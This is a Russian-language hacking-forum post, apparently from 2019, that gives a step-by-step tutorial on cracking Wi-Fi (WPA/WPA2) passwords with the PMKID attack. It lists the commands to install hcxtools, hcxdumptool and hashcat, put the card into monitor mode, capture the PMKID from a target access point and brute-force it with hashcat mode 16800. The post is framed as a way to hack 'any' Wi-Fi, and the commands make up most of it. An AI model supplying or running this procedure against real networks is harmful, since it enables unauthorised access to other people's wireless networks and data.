Перейти к содержимому


rek
Фотография

Новый метод взлома любого Wi-Fi

взлом wifi методы взлома хакерский софт программы для взлома хакерские программы

В этой теме нет ответов

#1 roguevad

roguevad
  • Эксперт.
  • Пользователи
  • PipPipPipPipPip
  • 301 сообщений

Отправлено 02 Февраль 2019 - 03:22

Всем привет, сегодня я хочу рассказать вам о новом способе взлома беспроводной точки доступа. Как уже многие могли убедиться, он является более эффективным чем те, что мы использовали раньше. Поэтому начем!

Способ в том, чтобы заполучить специальный ключ PMKID, что переводится как Pairwise Master Key Identifier.

Этот ключ позволяет узнать PSK – Pre-Shared Key, а именно он как раз-таки и является паролем от точки доступа. Вы спросите, чем же отличается данные метод от нам привычных? А тем, что нам не нужно получать полный хеншейк, и понадобится лишь один кадр EOPOL, ну а также еще одна отличительная черта - это то, что вам не нужно будет ждать, пока подключится какой-либо пользователь к сети, которую вы собираетесь атаковать. Связано это с тем, что атака будет производится на саму AP.

 

Необходимое для совершения атаки:

1. Linux

2. hcxtools

3. Hcxdumptool

4. Hashcat v4.2.0

 

Установка всего необходимого:

Hcstools устанавливается точно так же как и hcxdumprool

1. git clone ZerBea/hcxtools

2. cd hcxtools

3. make

4. make install

Hashcat v4.2.0

Если у вас уже присутствует эта программа, но она ниже указанной версии, то, к сожалению, или к счастью, вы будете вынуждены ее удалить, а потом установить более новою версию. Либо же обновить ее другими способами, ведь это необходимо по той причине, что прошлые версию не могут расшифровать PMKID.

1. git clone hashcat/hashcat

2. cd hashcat

3. make

4. make install

Сразу хочу сказать, для примера, я буду проводить атаку на собственный роутер, который имеет последнюю прошивку.

 

Перевод беспроводного интерфейса в режим монитора

Сделать это можно двумя методами, вот первый.

Пишем этот код:

airmon-ng start wlan0

airmon-ng check kill

 

Готово, теперь рассмотрим второй способ.

Пишем этот код:

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

airmon-ng check kill

 

Запуск сканирования WiFi точек

Первым делом нам нужно запустить сканирование, сделать это можно данной командой:

airodump wlan0mon (wlan0 выбираем смотря из того, какой метод вы использовали)

После того как это будет выполнено, вам нужно будет сохранить BSSID необходимой точки AP без двоеточий в файл, сделать это можно с помощью такого кода:

echo "60A44C55D7C0" > filter.txt

 

Запуск Hcxdumptool

Запуск выполняется с помощью данной команды:

hcxdumptool –I wlan0 –o hash –filterlist=filter.txt --filtermode=2 -- enable_status=1

Теперь обо всем по порядку:

-i wlano – Эта строка указывает на название вашего интерфейса

-o hash – файл получаемый на выходе, в котором содержится PMKID

--filtermode=2 – укажет на то, что наш файл будет целевым списком

--filterlist=filter.txt – текстовый файл BSSID, который мы уже создали ранее.

--enable_status=1 – включения сообщений с помощью маски.

Теперь, когда вы все это запустите, то через некоторое время вам придет сообщение – Found PMKID, после этого мы отключаем данный скрипт. Что тут еще сказать? Данная программа на ура выполняет свои задачи и находит необходимые нам пакеты, поэтому продолжим.

 

Запуск hcxpcaptool

Для этого вводим команду:

hcxpcaptool –z hash_crack hash

Опять же расскажу, что это все значит:

-z hash_crack – это файл который мы получим нвыходе, где будет записан PMKID без лишнего мусора

Hash – файл в формате pcapng, в нем будут находится все найденые пакеты hcxdumptool

 

Запуск HASHCAT

Достаточно ввести эту команду:

hashcat –m 16800 –a 3 –w hash_crack ‘?u?s?d23456A’ --force

В этой команде я хочу сказать только про –m 16800, именно эта команда и появляется в новой версии HASHCAT

Итак, после этих действий вам будет выведет пароль по маске а также возможно два последних знака из данного пароля. Конечно, продолжать проверку больше суток я для примера не буду, поэтому введу несколько символов из своего пароля, после чего получил результат намного быстрее. А результатом как раз-таки был пароль.

На этом все, поэтому теперь можно сказать о том, что этот способ намного эффективнее других атак. Конечно скорость получения результата не так уж и сильно превосходит aircrack-ng, но если же вы имеет у себя в компьютере хорошую видеокарту, то с этим можно даже поспорить. А также, теперь вам не нужно ждать неопределенное количество временя в ожидании подключения пользователя, так как теперь не нужно будет перехватывать хеншейк.

 



rek




Темы с аналогичным тегами взлом wifi, методы взлома, хакерский софт, программы для взлома, хакерские программы


reklama reklama

Рейтинг@Mail.ru Analysis informer pr cy
Рейтинг@Mail.ru
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal